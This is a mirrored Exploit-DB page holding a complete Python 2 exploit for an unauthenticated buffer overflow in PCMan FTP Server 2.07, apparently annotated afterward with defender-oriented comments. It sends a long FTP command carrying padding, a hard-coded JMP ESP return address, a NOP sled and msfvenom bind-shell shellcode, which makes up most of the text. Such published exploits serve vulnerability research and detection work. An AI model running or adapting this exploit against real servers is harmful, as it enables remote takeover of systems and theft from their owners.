PCMan FTP Server 2.07 – Remote Buffer Overflow

  • 作者: Sumit
    日期: 2014-02-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/31789/
  • # Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow (unauthenticated)
    # Date: Feb 19, 2014
    # Exploit Author: Sumit
    # Version: 2.07
    # Tested on: Windows XP Professional SP3
    # Description: A buffer overflow is triggered by sending a long string to PCMAN FTP 2.07 in place of a command
    #
    
    import socket
    import datetime
    
    """
    You have to take into account your IP addr and the server's date (if using NAT, check the external IP), as the buffer starts like the following:
    2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
    """
    
    # Review notes (defender's reading of this script):
    # - The overflowing data is the very first thing written to the control
    #   channel after connect: no USER/PASS is sent, so the vulnerable path is
    #   reachable before authentication (consistent with the title above).
    # - Detection: a single FTP control-channel line of roughly 2 KB, almost
    #   entirely a repeated 'A', followed by non-printable bytes and then CRLF,
    #   is far outside normal FTP command traffic and is easy to alert on.
    # - The hard-coded return address below is only expected to match the
    #   tested platform named in the header; treat it as version-specific.
    
    # Target address; the published value is a private (lab) address.
    host = '192.168.213.10'
    
    # Build today's date as 'YYYY/M/D' with leading zeros stripped, mirroring the
    # prefix the server places in front of the echoed command (see docstring).
    # This reads the *client's* clock, whereas the echoed prefix carries the
    # server's date — hence the author's caveat on the next line.
    d = str(datetime.datetime.today()).split()[0].split('-') # You should ideally consider servers date here
    for i in range(len(d)): d[i] = str(int(d[i]))
    d = '/'.join(d)	# Finally we got the date
    
    # Payload bytes as produced by the msfvenom command below. The -b list
    # excludes NUL, LF and CR: CR/LF terminate the FTP command line (see the
    # send call further down), so they cannot occur inside the payload.
    # msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'
    shellcode = (
    "\xda\xdb\xd9\x74\x24\xf4\xbe\xb5\x40\x16\xb6\x5b\x2b\xc9" +
    "\xb1\x56\x31\x73\x18\x83\xeb\xfc\x03\x73\xa1\xa2\xe3\x4a" +
    "\x21\xab\x0c\xb3\xb1\xcc\x85\x56\x80\xde\xf2\x13\xb0\xee" +
    "\x71\x71\x38\x84\xd4\x62\xcb\xe8\xf0\x85\x7c\x46\x27\xab" +
    "\x7d\x66\xe7\x67\xbd\xe8\x9b\x75\x91\xca\xa2\xb5\xe4\x0b" +
    "\xe2\xa8\x06\x59\xbb\xa7\xb4\x4e\xc8\xfa\x04\x6e\x1e\x71" +
    "\x34\x08\x1b\x46\xc0\xa2\x22\x97\x78\xb8\x6d\x0f\xf3\xe6" +
    "\x4d\x2e\xd0\xf4\xb2\x79\x5d\xce\x41\x78\xb7\x1e\xa9\x4a" +
    "\xf7\xcd\x94\x62\xfa\x0c\xd0\x45\xe4\x7a\x2a\xb6\x99\x7c" +
    "\xe9\xc4\x45\x08\xec\x6f\x0e\xaa\xd4\x8e\xc3\x2d\x9e\x9d" +
    "\xa8\x3a\xf8\x81\x2f\xee\x72\xbd\xa4\x11\x55\x37\xfe\x35" +
    "\x71\x13\xa5\x54\x20\xf9\x08\x68\x32\xa5\xf5\xcc\x38\x44" +
    "\xe2\x77\x63\x01\xc7\x45\x9c\xd1\x4f\xdd\xef\xe3\xd0\x75" +
    "\x78\x48\x99\x53\x7f\xaf\xb0\x24\xef\x4e\x3a\x55\x39\x95" +
    "\x6e\x05\x51\x3c\x0e\xce\xa1\xc1\xdb\x41\xf2\x6d\xb3\x21" +
    "\xa2\xcd\x63\xca\xa8\xc1\x5c\xea\xd2\x0b\xeb\x2c\x1d\x6f" +
    "\xb8\xda\x5c\x8f\x2f\x47\xe8\x69\x25\x67\xbc\x22\xd1\x45" +
    "\x9b\xfa\x46\xb5\xc9\x56\xdf\x21\x45\xb1\xe7\x4e\x56\x97" +
    "\x44\xe2\xfe\x70\x1e\xe8\x3a\x60\x21\x25\x6b\xeb\x1a\xae" +
    "\xe1\x85\xe9\x4e\xf5\x8f\x99\xf3\x64\x54\x59\x7d\x95\xc3" +
    "\x0e\x2a\x6b\x1a\xda\xc6\xd2\xb4\xf8\x1a\x82\xff\xb8\xc0" +
    "\x77\x01\x41\x84\xcc\x25\x51\x50\xcc\x61\x05\x0c\x9b\x3f" +
    "\xf3\xea\x75\x8e\xad\xa4\x2a\x58\x39\x30\x01\x5b\x3f\x3d" +
    "\x4c\x2d\xdf\x8c\x39\x68\xe0\x21\xae\x7c\x99\x5f\x4e\x82" +
    "\x70\xe4\x7e\xc9\xd8\x4d\x17\x94\x89\xcf\x7a\x27\x64\x13" +
    "\x83\xa4\x8c\xec\x70\xb4\xe5\xe9\x3d\x72\x16\x80\x2e\x17" +
    "\x18\x37\x4e\x32")
    
    # Plain TCP connection to the FTP control port; no login is attempted.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 21))
    
    nop = '\x90'*50  # 50 bytes of 0x90 (x86 NOP) placed before the payload
    # Overwrites the saved return address. Per the author's note this is a
    # JMP ESP inside USER32.dll on the tested Windows XP SP3 build; the value is
    # tied to that exact DLL build and is not expected to hold elsewhere.
    eip = '\x53\x93\x42\x7E' # EIP = 7E429353; JMP ESP in USER32.dll
    # The server prefixes the echoed command with the client's IP (see the
    # docstring), so the local address length feeds the offset calculation.
    myip = s.getsockname()[0]
    # Filler so that date + client IP + padding reach the return-address slot.
    # The fixed-width time and counter fields shown in the docstring are
    # presumably folded into the 2029 constant — not verified here.
    padding = 'A' * (2029 - (len(d) + len(myip)))
    
    # Layout on the wire: filler, return address, NOP sled, payload.
    buf = padding + eip + nop + shellcode
    
    # Sent as one CRLF-terminated line, i.e. in place of an FTP command.
    s.send('%s\r\n' % (buf))
    # Read up to 1 KiB of whatever the server replies, if anything.
    s.recv(1024)
    print 'Payload sent'  # Python 2 print statement: this script is Python 2 only
    s.close()